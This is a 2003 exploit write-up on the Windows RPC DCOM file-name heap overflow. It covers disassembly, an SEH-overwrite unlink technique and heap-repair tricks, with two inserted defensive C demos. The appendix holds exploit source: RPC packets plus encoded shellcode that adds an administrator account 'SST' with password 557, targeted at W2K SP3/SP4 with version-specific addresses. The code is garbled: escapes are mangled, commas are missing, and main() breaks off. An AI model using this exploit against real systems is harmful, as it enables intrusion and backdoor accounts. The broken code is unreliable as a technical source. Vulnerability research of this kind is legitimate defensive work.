Analysis of the RPC File Name Length Heap Overflow and Some Findings on Universal Heap Overflow Attacks
Created: 2003-09-20 Updated: 2003-09-21
Article attribute: original
Submitted by: Flashsky (Flashsky1_at_sina.com)
Please credit the author, Xfocus and Venustech when reprinting.
Author: FLASHSKY
Sites: www.xfocus.net, www.venustech.com.cn, www.shopsky.com
Email: Flashsky@xfocus.org
Affiliation: Venustech Active Defense Laboratory
Thanks to: eyas (eyas@xfocus.org) for the discussion of Winsock's use of the heap, and benjurry (benjurry@xfocus.org) for the English translation and technical discussion.
I would also like to thank all the members of Xfocus and the Venustech Active Defense Laboratory for their support and help.
1. Locating the RPC file name remote heap overflow
The RPC DCOM file name heap overflow is actually in the same interface as the local overflow from the previous LSD advisory; the difference is that one is a stack overflow and the other is a heap overflow, and it can be triggered in the same way as the stack overflow.
Trigger principle:
RPC DCOM checks the server name in the UNC path. If the server name is a NetBIOS name, an IP address, localhost or 127.0.0.1, it goes on to parse the file name that follows the server name.
The problem code is as follows:
.text:76151469    push    20Ah
.text:7615146E    push    edi
.text:7615146F    push    hHeap
.text:76151475    call    AllocHeap              ; <-- only a 0x20A-byte heap block is allocated
.text:7615147B    mov     edi, eax
.text:7615147D    test    edi, edi
.text:7615147F    jnz     short loc_76151491
.text:76151481    push    [ebp+hMem]             ; hMem
.text:76151484    call    ds:LocalFree
.text:7615148A
.text:7615148A loc_7615148A:                     ; CODE XREF: sub_761513C5+4Bj
.text:7615148A    mov     eax, 8007000Eh
.text:7615148F    jmp     short loc_761514B9
.text:76151491
.text:76151491 loc_76151491:                     ; CODE XREF: sub_761513C5+BAj
.text:76151491    mov     eax, [ebp+hMem]
.text:76151494    push    dword ptr [eax+18h]    ; lpString2
.text:76151497    push    edi                    ; lpString1
.text:76151498    call    ds:lstrcpyW
.text:7615149E    push    esi                    ; lpString2
.text:7615149F    push    edi                    ; lpString1
.text:761514A0    mov     [esi], bx
.text:761514A3    call    ds:lstrcatW            ; <-- lstrcatW appends our file name with no length check, overflowing the block
Because lstrcatW is used, the shellcode cannot contain the double byte 0x00,0x00 (a wide-character NUL).
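As an added example (not the article's code), the sizing logic the disassembly above lacks, in portable C: the combined length of the server name and file name is measured against the 261-wide-character block (0x20A bytes on Windows) before anything is copied, which is the check the lstrcpyW/lstrcatW sequence never performed. The server prefix and probe lengths are constructed for the demonstration.

```c
#include <stddef.h>
#include <wchar.h>

/* The heap block in the disassembly is 0x20A bytes, which on Windows holds 261
   wide characters (MAX_PATH plus the terminator). It is modelled by character
   count here so the code also runs where wchar_t is wider than 16 bits. */
#define UNC_BLOCK_CHARS 261

/* Same sequence as the vulnerable code (copy the server name, then append the
   file name), but the total is measured before anything is written.
   Returns 0 on success, -1 if the result would not fit in dst. */
static int build_unc_path(wchar_t *dst, size_t dst_chars,
                          const wchar_t *server, const wchar_t *file)
{
    size_t need = wcslen(server) + wcslen(file) + 1;   /* +1 for L'\0' */
    if (need > dst_chars)
        return -1;                /* the length check lstrcatW never did */
    wcscpy(dst, server);          /* what lstrcpyW did */
    wcscat(dst, file);            /* what lstrcatW did, now known to fit */
    return 0;
}

/* Constructed probe: a fixed 12-character server prefix followed by a file
   name of file_len characters, as a client could supply in the UNC path. */
static int probe(size_t file_len)
{
    static const wchar_t server[] = L"\\\\127.0.0.1\\";   /* 12 characters */
    wchar_t file[1024];
    wchar_t block[UNC_BLOCK_CHARS];
    size_t i;

    if (file_len >= sizeof file / sizeof file[0])
        return -2;                /* probe buffer too small for this test */
    for (i = 0; i < file_len; i++)
        file[i] = L'A';
    file[i] = L'\0';
    return build_unc_path(block, UNC_BLOCK_CHARS, server, file);
}

int main(void)
{
    /* 12 + 248 + 1 = 261 fits exactly; one more character would overflow. */
    return (probe(248) == 0 && probe(249) == -1) ? 0 : 1;
}
```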
2. Ideas for a universal heap overflow attack
By overwriting the heap management structure one can overwrite an SEH handler or a function return address and gain control, but heap overflows have always been regarded as hard to exploit in a universal way.
The most troublesome part of a heap overflow attack is locating the shellcode. Because heap addresses are not fixed, after gaining control there is almost no register or known memory location that points at our buffer, and no opcode such as JMP ESP can be used to reach it. Does that mean it really cannot be done? The answer is no.
When a normal heap management structure is unlinked, the contents of the freed block and the operation performed are as follows:
    freed block contents:  addr1  addr2
    operation:             mov [addr2], addr1
                           mov [addr1+4], addr2
If at this point addr2 is changed to the address of some exception handler record in the SEH chain and addr1 to the address of our shellcode, we gain control when an exception occurs. But how do we locate the shellcode?
In fact, our research found that constructing a specific heap management structure produces the following effect. Suppose addr3 is the parent (enclosing) heap block of addr1:
    freed block contents:  addr1  addr2
    operation:             mov [addr2], addr3
                           mov [addr3], addr1
                           mov [addr3+4], addr2
Because addr3 is located by the system's own mechanism, through that mechanism we can make execution go to addr3 when the exception occurs. We assumed we cannot control the contents at addr3, but because of mov [addr3], addr1 the first 8 bytes at addr3 become values we control through addr1. That is enough: we can use them to implement a JMP to our real shellcode. The distance between addr3 and addr1 is fixed for a given heap overflow, and the target area can also be widened by brute force with a large number of NOPs. So as long as we can construct such a heap management structure, a universal heap overflow attack is feasible. At least we found that constructing such a heap management structure in the RPC long file name heap overflow is feasible, and it worked in tests on W2K SP3 and SP4.
The specific mechanism of the universal method is described in "Windows Freed-Heap Structure Overwrite and Universal Heap Overflow".
Note: in fact HDM's exploit also uses this method, but it still does not succeed easily, because it does not handle the exceptions that occur after the heap is corrupted.
3. Implementing the RPC heap overflow attack
In fact I solved the shellcode positioning problem for the RPC overflow quite early, but I kept running into another problem: after the heap management structure has been destroyed, exceptions keep occurring, especially when the shellcode calls APIs.
On a W2K SP4 system with the MS03-26 patch, the method I used to solve this is to replace the process default heap recorded in the PEB with another heap in the system:
    mov eax, fs:[0x18]      ; TEB address
    mov eax, [eax+0x30]     ; PEB address
    lea eax, [eax+0x18]     ; address of the process default heap handle in the PEB
    mov ebx, 0x170000
    mov [eax], ebx          ; replace it with 0x170000
Note that the 0x170000 here is only valid for CN W2K SP4 MS03-26. To make it more general, the shellcode can call HeapCreate to create a new heap and substitute that instead.
########################################
This part comes from eyas's research (eyas@xfocus.org).
In addition: Winsock uses a global heap handle, gHeap, which is set to the process default heap when the DLL is initialized, so calling Winsock will raise a heap exception. It is generally recommended not to use Winsock-based shellcode, or to have the shellcode search for the gHeap variable itself and then call the API (since the address of gHeap may not be the same across versions, this may lose generality).
########################################
I started out with Winsock shellcode, which is why I replaced the default heap base.
Later, after writing "Windows Freed-Heap Structure Overwrite and Universal Heap Overflow", I found there is another way that does not cause heap exceptions when APIs are called: restore the heap free list structure. Since what gets destroyed is mainly the freed-heap structure, the corrupted entries can be removed from the linked list and it can be restored to a normal free list. This is more general and works with any API, but the shellcode is more complicated, and no example is given here.
(Note: for the specific mechanism see "Windows Freed-Heap Structure Overwrite and Universal Heap Overflow"; the idea is to turn the corrupted list back into a normal one. Once you have studied it and combined it with the diagram, this is not difficult, and it can be made quite general.
As long as you check that the entry reached through this entry's forward pointer has a back pointer leading back to this entry, you can tell where we overwrote; then simply point the forward pointer of the last intact entry at the head of the free list and it is solved, or directly point the list head at itself, which means the list is empty.)
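As an added illustration (not the article's code, and not the real Windows allocator), the two unlink writes from section 2 and the free-list consistency check from section 3 in a small model: an intact list unlinks normally, a list whose entry header was overwritten turns the unlink into a write of an attacker-chosen value to an attacker-chosen address, and the check that each neighbour still points back at the entry refuses that unlink (the same check Windows later shipped as safe unlinking). The list layout and the target slot are constructed for the demonstration.

```c
#include <stddef.h>
#include <string.h>

/* A freed block as the article lays it out: its first two words are the
   forward link (addr1) and the backward link (addr2). */
typedef struct entry {
    struct entry *flink;   /* addr1 */
    struct entry *blink;   /* addr2 */
} entry_t;

/* The unlink exactly as the article shows it: mov [addr2], addr1 ; mov [addr1+4], addr2 */
static void unlink_unchecked(entry_t *e)
{
    e->blink->flink = e->flink;   /* [addr2]   = addr1 */
    e->flink->blink = e->blink;   /* [addr1+4] = addr2 */
}

/* The consistency check from section 3: both neighbours must still point back
   at e; otherwise the links were overwritten and the two writes are refused. */
static int unlink_checked(entry_t *e)
{
    if (e->flink->blink != e || e->blink->flink != e)
        return -1;
    unlink_unchecked(e);
    return 0;
}

/* Constructed scenario: circular list head -> a -> victim -> c, a spare block
   standing in for the shellcode buffer (addr1), and a word standing in for the
   handler slot (addr2) that the overflow aims at. */
typedef struct { entry_t head, a, victim, c, shellcode_block, target; } scenario_t;

static void scenario_init(scenario_t *s)
{
    memset(s, 0, sizeof *s);
    s->head.flink = &s->a;     s->head.blink = &s->c;
    s->a.flink = &s->victim;   s->a.blink = &s->head;
    s->victim.flink = &s->c;   s->victim.blink = &s->a;
    s->c.flink = &s->head;     s->c.blink = &s->victim;
}

/* Model the overflow spilling into the victim's header: addr1 becomes the
   address to be written, addr2 the place it is written to. */
static void corrupt_victim(scenario_t *s)
{
    s->victim.flink = &s->shellcode_block;
    s->victim.blink = &s->target;
}

/* Intact list: the checked unlink succeeds and joins a <-> c. Returns 1. */
static int demo_intact(void)
{
    scenario_t s;
    scenario_init(&s);
    return unlink_checked(&s.victim) == 0 && s.a.flink == &s.c && s.c.blink == &s.a;
}

/* Corrupted header, no check: the unlink writes the block's address into the
   target slot (the arbitrary write). Returns 1 when that write happened. */
static int demo_unchecked_write(void)
{
    scenario_t s;
    scenario_init(&s);
    corrupt_victim(&s);
    unlink_unchecked(&s.victim);
    return s.target.flink == &s.shellcode_block;
}

/* Corrupted header, with check: the unlink is refused, target untouched. Returns 1. */
static int demo_checked_refuses(void)
{
    scenario_t s;
    scenario_init(&s);
    corrupt_victim(&s);
    return unlink_checked(&s.victim) == -1 && s.target.flink == NULL;
}
```

Each demo function returns 1 when the scenario behaves as described, so a harness can assert on them directly.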
Appendix: the following gives the code for this heap overflow.
Because of the harm done by worm writers and script kiddies, the code given below is not a very general version, but from the technical details and methods given above, people who understand them can write more general and more powerful code themselves. Target systems:
W2K SP3 MS03-26
W2K SP4 MS03-26
addr1: \xEB\x1E\x08\x00
Executed as code, this address is JMP 1E, which jumps to the real shellcode.
addr3: in the RPC case, addr3 is actually the buffer holding the server name from the preceding UNC path, from which it follows that the JMP 1E lands on our shellcode.
This mechanism is common to W2K Server SP3/SP4 MS03-26.
On SP4 the chance of success is good; on SP3 it sometimes fails when no user is logged on, because the overwritten heap block is then not in the free list. In a follow-up article we will discuss how to control the state of the heap from our side, manufacture such a freed block, and make use of this vulnerability more general.
Note that the SEH value needs to be modified for different systems.
The shellcode adds a user SST with password 557 in the Administrators group.
/*
 * RPCDCOM2.C ver 1.1
 * Code by Flashsky
 */
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <string.h>
unsigned char bindstr[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x7f, 0x00, 0x00, 0x00,
0xD0, 0x16, 0x00, 0x16, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0xA0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00};
unsigned char request1[] = {
0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0xe8, 0x03
0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x05, 0x00
0x06, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x32, 0x24, 0x58, 0xfd, 0xcc, 0x45
0x64, 0x49, 0xB0, 0X70, 0X2C, 0xAe, 0x74, 0x2c, 0x96, 0x0d, 0x60, 0x5e, 0x0d, 0x00, 0x01,0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x5e, 0x0d, 0x00, 0x02, 0x00, 0x00, 0x00, 0x7c, 0x5e
0x0D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x80, 0x96, 0xF1, 0xF1, 0x2a, 0x4d
0xCE, 0x11, 0xA6, 0x6a, 0x00, 0x20, 0xAf, 0x6e, 0x72, 0xF4, 0x0c, 0x00, 0x00, 0x00, 0x42, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 0x00, 0x0d, 0xF0, 0xAD, 0xBA, 0x00, 0x00
0x00, 0x00, 0xA8, 0xF4, 0x0b, 0x00, 0x60, 0x03, 0x00, 0x00, 0x60, 0x03, 0x00, 0x00, 0x4d, 0x45
0x4F, 0x57, 0x04, 0x00, 0x00, 0x00, 0xa2, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00
0x00, 0x00, 0x00, 0x38, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x03, 0x00, 0x00, 0x28, 0x03
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0xc8, 0x00
0x00, 0x00, 0x4d, 0x45, 0x4f, 0x57, 0x28, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc4, 0x28, 0xcd, 0x00, 0x64, 0x29
, 0xcd, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB9, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xAb, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xa5, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xa6, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xa4, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0xAD, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0XAA, 0x01, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x07, 0x00, 0x00, 0x00, 0x60, 0x00
0x00, 0x00, 0x58, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x20, 0x00
0x00, 0x00, 0x78, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x10
0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x50, 0x00, 0x00, 0x00, 0x4f, 0xB6, 0x88, 0x20, 0xFF, 0xFF
0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10
0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x48, 0x00, 0x00, 0x00, 0x07, 0x00, 0x66, 0x00, 0x06, 0x09
0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x10, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x78, 0x19, 0x0c, 0x00, 0x58, 0x00, 0x00, 0x00, 0x05, 0x00, 0x06, 0x00, 0x01, 0x00
0x00, 0x00, 0x70, 0xD8, 0x98, 0x93, 0x98, 0x4F, 0xD2, 0X11, 0XA9, 0X3D, 0XBE, 0X57, 0XB2, 0X00
0x00, 0x00, 0x32, 0x00, 0x31, 0x00, 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x80, 0x00
0x00, 0x00, 0x0d, 0xF0, 0xAD, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x18, 0x43, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x00
0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x4d, 0x45, 0x4f, 0x57, 0x04, 0x00, 0x00, 0x00, 0xc0, 0x01
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x3b, 0x03
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00
0x00, 0x00, 0x30, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x81, 0xc5, 0x17, 0x03, 0x80, 0x0e
0x99, 0x4a, 0x99, 0x99, 0xf1, 0x8a, 0x50, 0x6f, 0x7a, 0x85, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x30, 0x00
0x00, 0x00, 0x78, 0x00, 0x6e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xDa, 0x0d, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x20, 0x2f, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 0x00, 0x03, 0x00, 0x00, 0x00, 0x46, 0x00
0x58, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x10, 0x00
0x00, 0x00, 0x30, 0x00, 0x2e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x68, 0x00
0x00, 0x00, 0x0e, 0x00, 0xff, 0xff, 0x68, 0x8b, 0x0b, 0x00, 0x02,0x00,0x00,0x00,0x00,0x00
0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
unsigned char request2[] = {
0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00
0x00, 0x00, 0x5c, 0x00, 0x5c, 0x00};
unsigned char request3[] = {
0x46, 0x00, 0x43, 0x00, 0x24, 0x00, 0x46, 0x00,
0x31, 0x00, 0x32, 0x00, 0x33, 0x00, 0x34, 0x00, 0x35, 0x00
0x36, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x00, 0x31, 0x00, 0x31, 0x00
0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00, 0x31, 0x00
0x2e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x63, 0x00, 0x00, 0x00};
unsigned char sccnsp3sp4[] =
"/ x6c / x00 / x00 / x61 / x00 / x6c / x00 / x68 / x00"
"/ x6f / x00 / x00 / x5c / x00 / x43 / x00 / x24 / x00 / x5c / x00"
"/ x58 / x00 / x00 / x46 / x00 / Xeb / x7c / x46 / x00 / x46 / x00 / x38 / x6e"
"/ XEB / X02 / XEB / X05 / XE8 / XF9 / XFF / XFF / XFF / X58 / X83 / XC0 / X1B / X8D / XA0 / X01"
"/ XEB / X1E / XFF / X83 / XE4 / XFC / X8B / XEC / X33 / X99 / X01 / X80 / X30"
"/ XF6 / XE0 / XE0 / X93 / XDF / XFC / XF2 / XF7 / XEB / X06 / XF1 / XE1 / XD2"
// shellcode: add user SST, password 557, Administrators group
"/ XEB / X10 / XC9 / X66 / XB9 / X4D / X01 / X80 / X34 / X0A / X99 / XE2 / XFA"
"/ Xeb / X05 / XE8 / XEB / XFF / XFF / XFF"
"/ x70 / x99 / xcc / x12 / x75 / x18 / x99 / x19 / x99 / x99 / x99 / x12 / x6d"
"/ x71 / x92 / x98 / x9f / x66 / xaf / xf1 / x01 / x67 / x13 / x97 / x71 / x3c" "/ x99 / x99 / x99 / x10 / xdf / x95 / x66 / XAF / XF1 / XE7 / X41 / X7B / XEA / X71 / X0F / X99 ""
"/ x99 / x99 / x10 / xdf / x89 / xfd / x38 / x81 / x99 / x99 / x99 / x12 / xd9 / xa9 / x14 / xd9"
"/ x81 / x22 / x99 / x10 / x81 / xaa / x59 / xc9 / xf3 / xfd / xf1 / xb9 / xb6"
"/ XF8 / XFD / XF1 / XB9 / XEA / XEA / XED / XF1 / XEC / XEA / XFC / XEB / XEC / XF7 / XFC / XED"
"/ XB9 / X12 / X55 / XC9 / XC8 / X66 / XCF / X95 / XAA / X59 / XC9 / XF1 / XB9 / XAC / XAC / XAE"
"/ XF1 / XB9 / XEA / XEA / XED / XED / XEC / XEA / XFC / XEB / XF1 / XF7 / XFC / XED / XB9 / X12"
"/ X55 / XC9 / XC8 / X66 / XCF / X95 / XAA / X59 / XC9 / XF1 / XFD / XFD / X99 / X99 / XF1 / XED"
"/ XB9 / XB6 / XF8 / XF1 / XEA / XB9 / XEA / XEA / XF1 / XF8 / XED / XF6 / XEB / XF1 / XF0 / XEA"
"/ XED / XEB / XF1 / XFD / XF4 / XF0 / XF7 / XF1 / XEC / XE9 / XB9 / XF8 / XF1 / XF5 / XFE / XEB"
"/ XF6 / XF1 / XF5 / XF6 / XFA / XF8 / XF1 / XF7 / XFC / XED / XB9 / X12 / X55 / XC9 / XC8 / X66"
"/ XCF / X95 / XAA / X59 / XC9 / X66 / XCF / X89 / XCA / XCC / XCF / XCE / X12 / XF5 / XBD / X81"
"/ X12 / XDC / XA5 / X12 / XCD / X9C / XE1 / X9A / X4C / X12 / XD3 / X81 / X12 / XC3 / XB9 / X9A"
"/ x44 / x7a / xab / xd0 / x12 / xad / x12 / x9a / x6c / xaa / x66 / x65 / xaa / x59 / x35 / xa3"
"/ X5D / XED / X9E / X58 / X56 / X72 / X6B / XA2 / XE5 / XBD / X8D / XEC / X78"
"/ X12 / XC3 / XBD / X9A / X44 / XFF / X12 / X95 / XD2 / X12 / XC3 / X85 / X9A / X44 / X12 / X9D"
"/ x12 / x9b / x5c / x59 / x12 / x4c / xc6 / xc7 / xc4 / xc2 / x5b / x9d / x99"
"/ XCC / XCF / XFD / X38 / XA9 / X99 / X99 / X99 / X1C / X59 / XE1 / X95 / X12 / XD9 / X95 / X12"
"/ XE9 / X85 / X34 / X12 / X90 / X12 / XD9 / XAD / X12 / X31 / X21 / X99 / X99"
"/ x99 / x12 / x5c / xc7 / xc4 / x5b / x9d / x99 / x71 / x21 / x67 / x66 / x66"
"/ x6e / x60 / x38 / xcc / x54 / xd6 / x93 / xd7 / x93 / x 293 / x93 / x1a / xce / xaf / x1a / XCE"
"/ XAb / X1A / XCE / XD3 / X54 / XD6 / XBF / X92 / X92 / X93 / X93 / X1E / XD6 / XD7 / XC3 / XC6"
"/ XC2 / XC2 / XC2 / XD2 / XC2 / XDA / XC2 / XC2 / XC5 / XC2 / X6C / XC4 / X77 / X6C / XE6 / XD7"
"/ X6C / XC4 / X7B / X6C / XE6 / XDB / XD / X6C / XC4 / X6B / XC3 / X6C / XC4" "/ X7F / X19 / X95 / XD5 / X17 / X53 / XE6 / X6A "
"/ XC2 / XC1 / XC5 / XC0 / X6C / X41 / XC9 / XCA"
"/ x1a / x94 / xd4 / xd4 / xd4 / xd4 / x71 / x7a / x50 / x90 / x90 / x90" //
"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"
"/ X77 / XE0 / X43 / X00 / X00 / X10 / X5C / X00"
"/ XEB / X1E / X01 / X00" // for CN SP3 / SP4 -MS03-26
"/ x4c / x14 / xec / x77" // Top SEH for CN W2K SP4, replacement into your SEH
// padding, to make the UNC path length > 0x80*8 = 0x400 so that a large block is used to handle it; for the principle and the general method see my "Windows Freed-Heap Structure Overwrite and Universal Heap Overflow"
"/ XEB / X10 / X5A / X4A / X33 / XC9 / X66 / XB9 / X90 / X02 / X80 / X34 / X0A / X99 / XE2 / XFA"
"/ Xeb / X05 / XE8 / XEB / XFF / XFF / XFF"
"/ XC7 / X5F / X9D / XBD / XDD / X14 / XDD / XBD / XDD / XC9 / X14 / XDD / XBD / X9D / XC9 / X14"
"/ X1D / XBD / X1D / X99 / X99 / X99 / XC9 / X14 / X1D / XBD / X0D / X99 / X99 / X99 / XC9 / XAA"
"/ X59 / XC9 / XC9 / XC9 / XC9 / XCA / X14 / X1D / XBD / X2D / X99 / X99 / X99 / XC9 / X66 / XCF"
"/ X95 / X14 / XD5 / XBD / XDD / X14 / X8D / XBD / XAA / X59 / XC9 / XF1 / XAC / X99 / XAE / X99"
"/ XF1 / XB9 / X99 / XAC / X99 / XED / X99 / XF1 / XB9 / X99 / XEA / X99 / XF1"
"/ XFC / X99 / XEB / X99 / XEA / X99 / XF1 / XED / X99 / XB9 / X99 / XF1 / XF7"
"/ X99 / XFC / X99 / X12 / X45 / XC8 / XCB / XC8 / XCB / X14 / X1D / XBD / X29 / X99 / X99 / X99"
"/ xc9 / x14 / x99 / x99 / x99 / xc9 / xaa / x59 / xc9 / xc9 / xc9 / xc9 / xca"
"/ x14 / x1d / x99 / x99 / xc9 / x66 / xcf / x95 / xc3 / xc0 / xaa / x59 / xc9"
"/ XF1 / XFD / X99 / XFD / X99 / XF1 / XB6 / X99 / XF8 / X99 / XF1 / XED / X99 / XB9 / X99 / XF1"
"/ XEA / X99 / XEA / X99 / XF1 / XEA / X99 / XB9 / X99 / XF1 / XF6 / X99 / XEB / X99 / XF1 / XF8"
"/ X99 / XED / X99 / XEB / X99 / XF1 / XF0 / X99 / XEA / X99 / XF1 / XF0 / X99"
"/ XF7 / X99 / XF1 / XFD / X99 / XB9 / X99 / XF8 / X99 / XF1 / XEC / X99 / XE9"
"/ x99 / xf1 / x99 / x99 / xf5 / x99 / xfe / x99 / xf1 / xfa / x99 / xf8 / x99" "/ xf1 / xf5 / x99 / xf6 / x99 / xf1 / xed / X99 / XB9 / X99 / XF1 / XF7 / X99 / XFC / X99 / X12 "
"/ X45 / XC8 / XCB / X14 / X1D / XBD / X61 / X99 / X99 / X99 / XC9 / X14 / X1D / XBD / X91 / X98"
"/ X99 / X99 / XC9 / XAA / XC9 / XC9 / XCA / X14 / X1D / XBD / XB1 / X98 / X99"
"/ X99 / XC9 / X66 / XCF / X95 / XAA / X59 / XC9 / X66 / XCF / X89 / XCA / XCC / XCF / XCE / X12"
"/ XF5 / XBD / X81 / X12 / XDC / XA5 / X12 / XCD / X9C / XE1 / X9A / X4C / X12 / XD3 / X81 / X12"
"/ xc3 / xb9 / x9a / x44 / x7a / xab / xd0 / x12 / xad / x12 / x9a / x6c / xaa / x66 / x65 / xaa"
"/ x59 / x35 / xa3 / x5d / xed / x9e / x58 / x56 / x94 / x9a / x61 / x72 / x6b / xa2 / xe5 / xbd"
"/ X8D / XEC / X78 / X12 / XC3 / XBD / X9A / X44 / XFF / X12 / X95 / XD2 / X12 / XC3 / X85 / X9A"
"/ x44 / x12 / x9d / x12 / x9a / x5c / x72 / x9b / xaa / x59 / x12 / x4c / xc6 / xc7 / xc4 / xc2"
"/ X5B / X9D / X99 / XCC / XCF / XFD / X38 / XA9 / X99 / X99 / X99 / X1C / X59 / XE1 / X95 / X12"
"/ XD9 / X95 / X34 / XE9 / X85 / X91 / X72 / X90 / X12 / XD9 / XAD / X12 / X31"
"/ x21 / x99 / x99 / x99 / x12 / x5c / xc7 / xc4 / x5b / x9d / x99 / x71 / xec / x64 / x66 / x66"
"/ x04 / x04 / x00 / x70 / x00 / x04 / x40"
"/ x00 / x10 / x5c / x00 / x78 / x01 / x07 / x00 / x00 / xa0 / x04 / x00"
"/ x21 / x99 / x99 / x99 / x12 / x5c / xc7 / xc4 / x5b / x9d / x99 / x71"
unsigned char request4[] = {
0x01, 0x10
0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc, 0x20, 0x00, 0x00, 0x00, 0x30, 0x00, 0x2d, 0x00, 0x00, 0x00
0x00, 0x00, 0x88, 0x2a, 0x0c, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x8c
0x0c, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
int main(int argc, char **argv)
{
    WSADATA wsadata;
    SOCKET sock;
